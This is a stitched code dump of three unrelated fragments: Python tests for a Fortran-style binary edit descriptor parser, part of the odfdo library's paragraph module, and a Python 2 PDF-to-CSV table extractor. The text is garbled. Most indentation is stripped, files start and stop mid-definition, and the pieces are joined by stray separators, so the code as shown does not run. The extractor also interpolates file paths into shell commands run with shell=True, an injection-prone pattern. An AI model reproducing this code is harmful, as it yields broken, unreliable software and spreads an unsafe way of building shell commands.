def test_b_ed_input_701(self):
inp = '''-1'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_702(self):
inp = '''2'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_703(self):
inp = '''10'''
fmt = '''(B5.3)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_704(self):
inp = '''-10'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_705(self):
inp = '''100'''
fmt = '''(B5.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_706(self):
inp = '''-100'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_707(self):
inp = '''1000'''
fmt = '''(B5.3)'''
result = [8]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_708(self):
inp = '''-1000'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_709(self):
inp = '''10000'''
fmt = '''(B5.3)'''
result = [16]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_710(self):
inp = '''-10000'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_711(self):
inp = '''100000'''
fmt = '''(B5.3)'''
result = [16]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_712(self):
inp = '''-100000'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_713(self):
inp = '''10 0 00 10 0 0 1'''
fmt = '''(B5.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_714(self):
inp = '''10101000'''
fmt = '''(B5.3)'''
result = [21]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_715(self):
inp = '''0'''
fmt = '''(B6.3)'''
result = [0]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_716(self):
inp = '''-0'''
fmt = '''(B6.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_717(self):
inp = '''1'''
fmt = '''(B6.3)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_718(self):
inp = '''-1'''
fmt = '''(B6.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_719(self):
inp = '''2'''
fmt = '''(B6.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_720(self):
inp = '''10'''
fmt = '''(B6.3)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_721(self):
inp = '''-10'''
fmt = '''(B6.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_722(self):
inp = '''100'''
fmt = '''(B6.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_723(self):
inp = '''-100'''
fmt = '''(B6.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_724(self):
inp = '''1000'''
fmt = '''(B6.3)'''
result = [8]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_725(self):
inp = '''-1000'''
fmt = '''(B6.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_726(self):
inp = '''10000'''
fmt = '''(B6.3)'''
result = [16]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_727(self):
inp = '''-10000'''
fmt = '''(B6.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_728(self):
inp = '''100000'''
fmt = '''(B6.3)'''
result = [32]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
| |
# Copyright 2018-2020 <NAME>
# Copyright (c) 2009-2013 <NAME>, Itaapy, Pierlis, Talend.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Authors (odfdo project): <EMAIL>
# The odfdo project is a derivative work of the lpod-python project:
# https://github.com/lpod/lpod-python
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
"""Paragraph class for "text:p", Span class for "text:span"
"""
import re
from functools import wraps # for keeping trace of docstring with decorators
from .bookmark import Bookmark, BookmarkStart, BookmarkEnd
from .element import FIRST_CHILD, NEXT_SIBLING, register_element_class, Element
from .paragraph_base import ParagraphBase, Spacer, Tab, LineBreak
from .note import Note, Annotation, AnnotationEnd
from .reference import Reference, ReferenceMark, ReferenceMarkStart, ReferenceMarkEnd
from .link import Link
def _by_regex_offset(method):
    """Decorator: apply *method* at the text position matched by a regex OR at
    an explicit (offset, length) span.

    The wrapped method is called as ``method(element, match, tail, *args,
    **kwargs)`` and must return the element to insert at the matched spot.

    Keyword arguments consumed here:

        regex -- unicode regular expression

        offset -- int

        length -- int

    (The docstring used to live inside ``wrapper``, where ``@wraps`` silently
    replaced it with the wrapped method's own docstring; it is kept on the
    decorator instead.)
    """
    @wraps(method)
    def wrapper(element, *args, **kwargs):
        offset = kwargs.get("offset", None)
        regex = kwargs.get("regex", None)
        # offset takes precedence over regex when both are supplied.
        # BUG FIX: test "is not None" rather than truthiness, so that
        # offset=0 (insert at the very start) is honored instead of
        # silently falling through to the regex branch.
        if offset is not None:
            length = kwargs.get("length", 0)
            counted = 0
            # NOTE(review): "//text()" is document-absolute in standard
            # XPath, while the regex branch below uses the relative
            # "descendant::text()" -- confirm which is intended for this
            # Element.xpath implementation.
            for text in element.xpath("//text()"):
                if len(text) + counted <= offset:
                    counted += len(text)
                    continue
                # clamp an explicit length to this text node; 0 means
                # "to the end of the node"
                if length > 0:
                    length = min(length, len(text))
                else:
                    length = len(text)
                # Static information about the text node
                container = text.parent
                upper = container.parent
                is_text = text.is_text()
                start = offset - counted
                end = start + length
                # Do not use the text node as it changes at each loop
                if is_text:
                    text = container.text
                else:
                    text = container.tail
                before = text[:start]
                match = text[start:end]
                tail = text[end:]
                result = method(element, match, tail, *args, **kwargs)
                if is_text:
                    container.text = before
                    # Insert as first child
                    container.insert(result, position=0)
                else:
                    container.tail = before
                    # Insert as next sibling
                    index = upper.index(container)
                    upper.insert(result, position=index + 1)
                return
        if regex:
            pattern = re.compile(regex)
            for text in element.xpath("descendant::text()"):
                # Static information about the text node
                container = text.parent
                upper = container.parent
                is_text = text.is_text()
                # Group positions are calculated and static, so apply in
                # reverse order to preserve positions
                for group in reversed(list(pattern.finditer(text))):
                    start, end = group.span()
                    # Do not use the text node as it changes at each loop
                    if is_text:
                        text = container.text
                    else:
                        text = container.tail
                    before = text[:start]
                    match = text[start:end]
                    tail = text[end:]
                    result = method(element, match, tail, *args, **kwargs)
                    if is_text:
                        container.text = before
                        # Insert as first child
                        container.insert(result, position=0)
                    else:
                        container.tail = before
                        # Insert as next sibling
                        index = upper.index(container)
                        upper.insert(result, position=index + 1)
    return wrapper
class Paragraph(ParagraphBase):
"""Specialised element for paragraphs "text:p". The "text:p" element
represents a paragraph, which is the basic unit of text in an OpenDocument
file.
"""
_tag = "text:p"
def __init__(self, text_or_element=None, style=None, **kwargs):
"""Create a paragraph element of the given style containing the optional
given text.
Arguments:
text -- str or Element
style -- str
Return: Paragraph
"""
super().__init__(**kwargs)
if self._do_init:
if isinstance(text_or_element, Element):
self.append(text_or_element)
else:
self.text = text_or_element
if style is not None:
self.style = style
def insert_note(
self,
note_element=None,
after=None,
note_class="footnote",
note_id=None,
citation=None,
body=None,
):
if note_element is None:
note_element = Note(
note_class=note_class, note_id=note_id, citation=citation, body=body
)
else:
# XXX clone or modify the argument?
if note_class:
note_element.note_class = note_class
if note_id:
note_element.note_id = note_id
if citation:
note_element.citation = citation
if body:
note_element.note_body = body
note_element.check_validity()
if isinstance(after, str):
self._insert(note_element, after=after, main_text=True)
elif isinstance(after, Element):
after.insert(note_element, FIRST_CHILD)
else:
self.insert(note_element, FIRST_CHILD)
    def insert_annotation(
        self,
        annotation_element=None,
        before=None,
        after=None,
        position=0,
        content=None,
        body=None,
        creator=None,
        date=None,
    ):
        """Insert an annotation, at the position defined by the regex (before,
        after, content) or by positional argument (position). If content is
        provided, the annotation covers the full content regex. Else, the
        annotation is positioned either 'before' or 'after' provided regex.

        If content is an odf element (ie: paragraph, span, ...), the full inner
        content is covered by the annotation (or the position just after if
        content is a single empty tag).

        If content/before or after exists (regex) and return a group of matching
        positions, the position value is the index of matching place to use.

        annotation_element can contain a previously created annotation, else
        the annotation is created from the body, creator and optional date
        (current date by default).

        Arguments:

            annotation_element -- Annotation or name

            before -- str regular expression or None

            after -- str regular expression or None

            content -- str regular expression or None, or Element

            position -- int or tuple of int

            body -- str or Element

            creator -- str

            date -- datetime
        """
        if annotation_element is None:
            annotation_element = Annotation(
                text_or_element=body, creator=creator, date=date, parent=self
            )
        else:
            # XXX clone or modify the argument?
            # Override only the attributes the caller actually provided.
            if body:
                annotation_element.body = body
            if creator:
                annotation_element.dc_creator = creator
            if date:
                annotation_element.dc_date = date
        annotation_element.check_validity()
        # special case: content is an odf element (ie: a paragraph)
        if isinstance(content, Element):
            if content.is_empty():
                # Empty tag: nothing to wrap, annotate the position after it.
                content.insert(annotation_element, xmlposition=NEXT_SIBLING)
                return annotation_element
            content.insert(annotation_element, start=True)
            annotation_end = AnnotationEnd(annotation_element)
            content.append(annotation_end)
            return annotation_element
        # special case
        if isinstance(after, Element):
            after.insert(annotation_element, FIRST_CHILD)
            return annotation_element
        # With "content" => automatically insert a "start" and an "end"
        # bookmark
        if (
            before is None
            and after is None
            and content is not None
            and isinstance(position, int)
        ):
            # Start tag
            self._insert(
                annotation_element, before=content, position=position, main_text=True
            )
            # End tag
            annotation_end = AnnotationEnd(annotation_element)
            self._insert(
                annotation_end, after=content, position=position, main_text=True
            )
            return annotation_element
        # With "(int, int)" => automatically insert a "start" and an "end"
        # bookmark
        if (
            before is None
            and after is None
            and content is None
            and isinstance(position, tuple)
        ):
            # Start
            self._insert(annotation_element, position=position[0], main_text=True)
            # End
            annotation_end = AnnotationEnd(annotation_element)
            self._insert(annotation_end, position=position[1], main_text=True)
            return annotation_element
        # Without "content" nor "position"
        if content is not None or not isinstance(position, int):
            raise ValueError("bad arguments")
        # Insert
        self._insert(
            annotation_element,
            before=before,
            after=after,
            position=position,
            main_text=True,
        )
        return annotation_element
def insert_annotation_end(
self, annotation_element, before=None, after=None, position=0
):
"""Insert an annotation end tag for an existing annotation. If some end
tag already exists, replace it. Annotation end tag is set at the
position defined by the regex (before or after).
If content/before or after (regex) returns a group of matching
positions, the position value is the index of matching place to use.
Arguments:
annotation_element -- Annotation (mandatory)
before -- str regular expression or None
after -- str regular expression or None
position -- int
"""
if annotation_element is None:
raise ValueError
if not isinstance(annotation_element, Annotation):
raise ValueError("Not a <office:annotation> Annotation")
# remove existing end tag
name = annotation_element.name
existing_end_tag = self.get_annotation_end(name=name)
if existing_end_tag:
existing_end_tag.delete()
# create the end tag
end_tag = AnnotationEnd(annotation_element)
# Insert
self._insert(
end_tag, before=before, after=after, position=position, main_text=True
)
return end_tag
def set_reference_mark(
self, name, before=None, after=None, position=0, content=None
):
"""Insert a reference mark, at the position defined by the regex
(before, after, content) or by positionnal argument (position). If
content is provided, the annotation covers the full range content regex
(instances of ReferenceMarkStart and ReferenceMarkEnd are
created). Else, an instance of ReferenceMark is positionned either
'before' or 'after' provided regex.
If content is an ODF Element (ie: Paragraph, Span, ...), the full inner
content is referenced (of the position just after if content is a single
empty tag).
If content/before or after exists (regex) and return a group of matching
positions, the position value is the index of matching place to use.
Name is mandatory and shall be unique in the document for the preference
mark range.
Arguments:
name -- str
before -- str regular expression or None
after -- str regular expression or None, or Element
content -- str regular expression or None, or Element
position -- int or tuple of int
Return: | |
<filename>pdf_to_csv.py<gh_stars>10-100
'Class for extracting CSV files from single table per page PDF documents'
import argparse
import numpy
import csv
import cv2
import logging
from logging.config import fileConfig
import ConfigParser
import io
import os
from PyPDF2 import PdfFileReader, PdfFileWriter
import re
import subprocess
# Configure logging from the shared parser config; module-level logger.
fileConfig('parsers/logging_config.ini')
logger = logging.getLogger()

# Pixel padding added around detected lines when computing table limits.
BUFFER_LENGTH = 10
# BGR value treated as background when trimming vertical lines.
DEFAULT_PIXEL_COLOR = [255, 255, 255]
# Sentinel row written between per-page tables in the intermediate CSV.
PAGE_BREAK_HANDLE = '"||page_break||"'
# Aperture size passed to cv2.Canny edge detection.
DEFAULT_APERTURE_SIZE = 3
class PDF2CSV(object):
"""
Base Class for converting pdf to csv.
"""
def __init__(self):
self.page_break = PAGE_BREAK_HANDLE
self.temp_img_file = ''
self.temp_csv_file = ''
def generate_csv_file(self, input_pdf_filepath, out_csv_filepath,
is_header=True, identify_columns=False,
temp_file_postfix="", check_page_rotation=False):
"""
Generate the csv file for a given pdf.
We loop through all the pages from the pdf and generate tables from it.
Args:
- input_pdf_filepath (string): The path of the pdf to be parsed.
- out_csv_filepath (string): The path where the parsed csv to
be stored.
- is_header (boolean): Whether we should be looking
for headers while detecting table limits. Defaults to True
- identify_columns (boolean): ????
- temp_file_postfix (string): optional postfix for the temp files
generated for the processing. Defaults to an empty string ""
- check_page_rotation (boolean): The program tries to detect the
table with multiple rotation angles.
Returns:
None
"""
input_pdf_obj = PdfFileReader(open(input_pdf_filepath, 'rb'))
total_pages = input_pdf_obj.getNumPages()
department_name = os.path.basename(input_pdf_filepath).lower().split(".pdf")[0].decode('utf-8')
temp_handle = re.sub(r'[^A-Za-z0-9]', '_', department_name)
self.temp_pdf_file = '/tmp/temp_doc_%s%s.pdf' % (temp_handle,
temp_file_postfix)
self.temp_img_file = '/tmp/pdf_image_%s%s.png' % (temp_handle,
temp_file_postfix)
self.temp_csv_file = '/tmp/temp_data_%s%s.csv' % (temp_handle,
temp_file_postfix)
out_file_obj = open(self.temp_csv_file, 'w')
for page_num in range(total_pages):
page_table_data = self.generate_page_table_data(input_pdf_filepath,
input_pdf_obj,
page_num,
is_header,
identify_columns,
check_page_rotation)
if page_table_data:
out_file_obj.write("\n%s" % page_table_data)
out_file_obj.write("\n%s" % self.page_break)
out_file_obj.close()
self.process_csv_file(out_csv_filepath)
    def generate_page_table_data(self, input_pdf_filepath, input_pdf_obj,
                                 page_num, is_header, identify_columns,
                                 check_page_rotation):
        '''Convert a pdf page into table using image processing and tabula.

        This function acts as the pipeline through which we extract tables
        from pdf. The pipeline consists of the following steps : -
            - Check Rotation of the page.
            - Generate Image of the page using `convert` command.
            - Detect lines for the table.
            - Use tabula with the coordinates detected from the previous
              processes.

        Args:
            - input_pdf_filepath (string): The path of the pdf to be parsed.
            - input_pdf_obj (obj:`PdfFileReader`): pdf file reader object used
                to access information from the pdf.
            - page_num (int): The page number to detect tables on.
            - is_header (boolean): Used while detecting table limits.
            - identify_columns (boolean): Whether to detect column separators
                and pass them to tabula (presumably for ruled tables — TODO
                confirm with callers).
            - check_page_rotation (boolean): The program tries to detect the
                table with multiple rotation angles.

        Returns:
            The raw bytes/str emitted by the tabula subprocess (CSV rows),
            or an empty string when no table was found.
        '''
        page_table_data = ""
        page_layout = input_pdf_obj.getPage(page_num)['/MediaBox']
        # A /Rotate of 90 swaps the roles of width and height.
        if '/Rotate' in input_pdf_obj.getPage(page_num) and input_pdf_obj.getPage(page_num)['/Rotate'] == 90:
            page_width = float(page_layout[3])
            page_height = float(page_layout[2])
        else:
            page_width = float(page_layout[2])
            page_height = float(page_layout[3])
        # Render the single page to a PNG via ImageMagick.
        command = "convert -density 300 '%s'[%s] '%s'" % (input_pdf_filepath,
                                                          page_num,
                                                          self.temp_img_file)
        subprocess.check_output(command, shell=True)
        self.image_object = cv2.imread(self.temp_img_file)
        image_height, image_width, channels = self.image_object.shape
        # Ratios convert pixel coordinates back to PDF points for tabula.
        self.horizontal_ratio = page_width/image_width
        self.vertical_ratio = page_height/image_height
        lines = self.get_straight_lines()
        table_limits = self.get_table_limits(lines, is_header)
        column_coordinates = None
        if identify_columns:
            lines = self.modify_image(lines, table_limits)
        # HoughLinesP returns a numpy array when lines were found.
        if type(lines).__module__ == "numpy":
            lines, column_coordinates = self.extend_lines_for_table(lines,
                                                                    is_header,
                                                                    table_limits)
        table_bounds = self.get_table_bounds()
        tabula_command = self.get_tabula_command_extenstion()
        # NOTE(review): column_coordinates stays None unless identify_columns
        # produced them, which sends every other page to the "no table found"
        # branch below — confirm this is intended.
        if table_bounds and column_coordinates:
            if identify_columns:
                # Join the detected x-coordinates into tabula's --columns CSV.
                column_values = ""
                for value in column_coordinates:
                    if column_values:
                        column_values += "," + str(value)
                    else:
                        column_values = str(value)
                command = "%s --pages %s --area %s,%s,%s,%s --columns %s '%s'" % (tabula_command, page_num+1, table_bounds["top"], table_bounds["left"], table_bounds["bottom"], table_bounds["right"], column_values, input_pdf_filepath)
            else:
                command = "%s --pages %s --area %s,%s,%s,%s '%s'" % (tabula_command, page_num+1, table_bounds["top"], table_bounds["left"], table_bounds["bottom"], table_bounds["right"], input_pdf_filepath)
            logger.info("Processing: %s" % command)
            try:
                page_table_data = subprocess.check_output(command, shell=True)
            except subprocess.CalledProcessError as e:
                logger.error("command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
                page_table_data = e.output
            if not page_table_data and check_page_rotation:
                # Retry once with the page rotated 90 degrees clockwise.
                logger.info("Rotating Page")
                rotated_pdf_obj = self.get_rotated_pdf_obj(input_pdf_obj, page_num)
                page_table_data = self.generate_page_table_data(self.temp_pdf_file, rotated_pdf_obj, 0, is_header, check_page_rotation=False)
        else:
            warning_message = "No table found on {0} from file {1}"
            logger.warning(warning_message.format(page_num, input_pdf_filepath))
        return page_table_data
def get_rotated_pdf_obj(self, input_pdf_obj, page_num):
'''Rotate a given pdf clockwise 90 degress.
Args:
input_pdf_obj (obj:`PdfFileReader`): PdfFileReader object of the
file to rotate.
page_num (int): Page number to rotate.
Returns:
A PdfFileReader object of the rotated pdf.
'''
temp_pdf_obj = PdfFileWriter()
temp_pdf_obj.addPage(input_pdf_obj.getPage(page_num).rotateClockwise(90))
output_stream = file(self.temp_pdf_file, "wb")
temp_pdf_obj.write(output_stream)
output_stream.close()
rotated_pdf_obj = PdfFileReader(open(self.temp_pdf_file, 'rb'))
return rotated_pdf_obj
def get_straight_lines(self, aperture_size=DEFAULT_APERTURE_SIZE):
'''Extract long straight lines using Probabilistic Hough Transform
'''
image_gray = cv2.cvtColor(self.image_object, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(image_gray, 100, 150, apertureSize=aperture_size)
min_line_length = 100
max_line_gap = 100
lines = cv2.HoughLinesP(edges, 1, numpy.pi/180, 80, min_line_length,
max_line_gap)
return lines
    def get_table_limits(self, lines, is_header):
        '''Get maximum horizontal and vertical line coordinates for bounding box

        Scans the Hough line segments and accumulates, per axis, the longest
        ruled line plus the extreme coordinates (padded by BUFFER_LENGTH).

        Args:
            lines: numpy array from cv2.HoughLinesP, or None.
            is_header (boolean): when True, lines above the header base line
                are excluded from the horizontal minimum.

        Returns:
            dict with "horizontal"/"vertical" entries, each holding
            {"stretch": [min, max], "found": bool,
             "max": [length, start, end, perpendicular-min]}.
        '''
        table_limits = {}
        found_horizontal_line = False
        found_vertical_line = False
        vertical_stretch = [0,0]
        horizontal_stretch = [0,0]
        # [length, start-coord, end-coord, min perpendicular coordinate]
        max_horizontal = [0,0,0,0]
        max_vertical = [0,0,0,0]
        horizontal_base_line = 0
        if is_header:
            horizontal_base_line = self.get_horizontal_base_line(lines)
        vertical_base_line = 0
        # HoughLinesP returns a numpy array only when segments were found.
        if type(lines).__module__ == "numpy":
            for line in lines:
                for x1,y1,x2,y2 in line:
                    if x1 == x2:
                        # Perfectly vertical segment.
                        if not found_vertical_line:
                            found_vertical_line = True
                        length = (y1 - y2)
                        if max_vertical[0] <= length:
                            max_vertical[0] = length
                            max_vertical[1] = y1 + BUFFER_LENGTH
                            max_vertical[2] = y2 - BUFFER_LENGTH
                        # Track the left-most vertical line (the table's left edge).
                        if (max_vertical[3] == 0 or max_vertical[3] > (x1 - BUFFER_LENGTH)) and (x1 - BUFFER_LENGTH) > vertical_base_line:
                            max_vertical[3] = (x1 - BUFFER_LENGTH)
                        horizontal_stretch = self.get_max_stretch(x1, horizontal_stretch)
                    elif y1 == y2:
                        # Perfectly horizontal segment.
                        if not found_horizontal_line:
                            found_horizontal_line = True
                        length = (x2 - x1)
                        if max_horizontal[0] <= length:
                            max_horizontal[0] = length
                            max_horizontal[1] = x1 - BUFFER_LENGTH
                            max_horizontal[2] = x2 + BUFFER_LENGTH
                        # Track the top-most horizontal line below the header base line.
                        if (max_horizontal[3] == 0 or max_horizontal[3] > (y1 - BUFFER_LENGTH)) and (y1 - BUFFER_LENGTH) > horizontal_base_line:
                            max_horizontal[3] = (y1 - BUFFER_LENGTH)
                        if not is_header:
                            vertical_stretch = self.get_max_stretch(y1, vertical_stretch)
        # Clamp each axis against the other's perpendicular minimum.
        if max_vertical[2] > max_horizontal[3] and max_horizontal[3] > 0:
            max_vertical[2] = max_horizontal[3]
        if max_horizontal[1] > max_vertical[3] and max_vertical[3] > 0:
            max_horizontal[1] = max_vertical[3]
        # Fall back to observed stretches when one orientation is missing.
        if (not found_vertical_line and found_horizontal_line) or not is_header:
            max_vertical[1:3] = vertical_stretch
        elif not found_horizontal_line and found_vertical_line:
            max_horizontal[1:3] = horizontal_stretch
        max_vertical = self.fix_vertical_lines(lines, max_vertical)
        table_limits["horizontal"] = {"stretch": horizontal_stretch, "found": found_horizontal_line, "max": max_horizontal}
        table_limits["vertical"] = {"stretch": vertical_stretch, "found": found_vertical_line, "max": max_vertical}
        return table_limits
    def extend_lines_for_table(self, lines, is_header, table_limits):
        '''
        Extend straight lines to create table bounds

        Redraws every detected segment stretched to the table limits directly
        onto self.image_object, closes the left/right borders, and writes the
        modified image back to self.temp_img_file.

        Returns:
            (lines, column_coordinates) where column_coordinates is the list
            of clustered x-positions (in PDF points) of vertical lines.
        '''
        column_coordinates = []
        for line in lines:
            for x1, y1, x2, y2 in line:
                if x1 == x2:
                    # Vertical: stretch to the full table height and remember
                    # the x-position as a candidate column separator.
                    y1 = table_limits["vertical"]["max"][1]
                    y2 = table_limits["vertical"]["max"][2]
                    column_coordinates.append(x1)
                elif y1 == y2:
                    # Horizontal: stretch to the full table width.
                    x1 = table_limits["horizontal"]["max"][1]
                    x2 = table_limits["horizontal"]["max"][2]
                cv2.line(self.image_object, (x1, y1), (x2, y2), (0, 0, 0), 4)
        # Close the right border of the table.
        cv2.line(self.image_object,
                 (table_limits["horizontal"]["max"][2],
                  table_limits["vertical"]["max"][1]),
                 (table_limits["horizontal"]["max"][2],
                  table_limits["vertical"]["max"][2]),
                 (0, 0, 0), 4)
        # Close the left border of the table.
        cv2.line(self.image_object,
                 (table_limits["horizontal"]["max"][1],
                  table_limits["vertical"]["max"][1]),
                 (table_limits["horizontal"]["max"][1],
                  table_limits["vertical"]["max"][2]),
                 (0, 0, 0), 4)
        cv2.imwrite(self.temp_img_file, self.image_object)
        if column_coordinates:
            column_coordinates = self.get_clubbed_column_coordinates(column_coordinates)
        return lines, column_coordinates
def get_max_stretch(self, coordinate, stretch_vector):
if stretch_vector[0] == stretch_vector[1] == 0:
stretch_vector[0] = stretch_vector[1] = coordinate + BUFFER_LENGTH
elif coordinate < stretch_vector[0]:
stretch_vector[0] = coordinate - BUFFER_LENGTH
elif coordinate > stretch_vector[1]:
stretch_vector[1] = coordinate + BUFFER_LENGTH
return stretch_vector
    def get_clubbed_column_coordinates(self, column_coordinates):
        '''Cluster near-duplicate column x-positions and convert to PDF points.

        Coordinates closer than BUFFER_LENGTH to the current pivot are merged
        into one cluster; each cluster is replaced by its mean scaled by
        self.horizontal_ratio. Assumes column_coordinates is non-empty
        (the caller guards on truthiness).

        NOTE(review): the mean uses `/` on ints — under Python 2 (which this
        module targets: ConfigParser, file(), str.decode) that is integer
        division; verify before porting to Python 3.
        '''
        clubbed_column_coordinates = []
        column_cluster_list = []
        # De-duplicate and sort so clustering is a single left-to-right pass.
        column_coordinates = list(set(column_coordinates))
        column_coordinates.sort()
        pivot = column_coordinates[0]
        point_cluster = []
        for point in column_coordinates:
            if point - pivot < BUFFER_LENGTH:
                point_cluster.append(point)
            else:
                # Gap found: close the current cluster, start a new one.
                pivot = point
                column_cluster_list.append(point_cluster)
                point_cluster = [point]
        # Flush the trailing cluster.
        if point_cluster:
            column_cluster_list.append(point_cluster)
        for column_cluster in column_cluster_list:
            clubbed_column_coordinates.append((sum(column_cluster)/len(column_cluster))*self.horizontal_ratio)
        return clubbed_column_coordinates
    def fix_vertical_lines(self, lines, max_vertical):
        '''Walk each vertical line upward to the first background pixel and
        raise the table's upper vertical bound accordingly.

        max_vertical layout: [length, start-y, end-y, min-x]; whichever of
        start-y/end-y is smaller is treated as the top bound.
        '''
        image_height, image_width, channels = self.image_object.shape
        # Pick the index holding the smaller (upper) y-coordinate.
        if max_vertical[1] > max_vertical[2]:
            min_vertical_index = 2
        else:
            min_vertical_index = 1
        # No detected lines => nothing to fix.
        if not type(lines).__module__ == "numpy":
            return max_vertical
        for line in lines:
            for x1, y1, x2, y2 in line:
                if x1 == x2:
                    # Climb while the pixel is still part of a drawn line
                    # (i.e. not the default background colour).
                    while(self.image_object[y2, x2].tolist() != DEFAULT_PIXEL_COLOR and y2 > 0):
                        y2 -= 1
                    if y2 < max_vertical[min_vertical_index]:
                        max_vertical[min_vertical_index] = y2
        return max_vertical
def get_horizontal_base_line(self, lines):
'''Gives vertical coordinate of horizontal base line(aka header line)
'''
horizontal_base_line = 0
for line in lines:
for x1, y1, x2, y2 in line:
if y1 == y2 and (horizontal_base_line == 0 or horizontal_base_line > y1):
horizontal_base_line = y1 + BUFFER_LENGTH
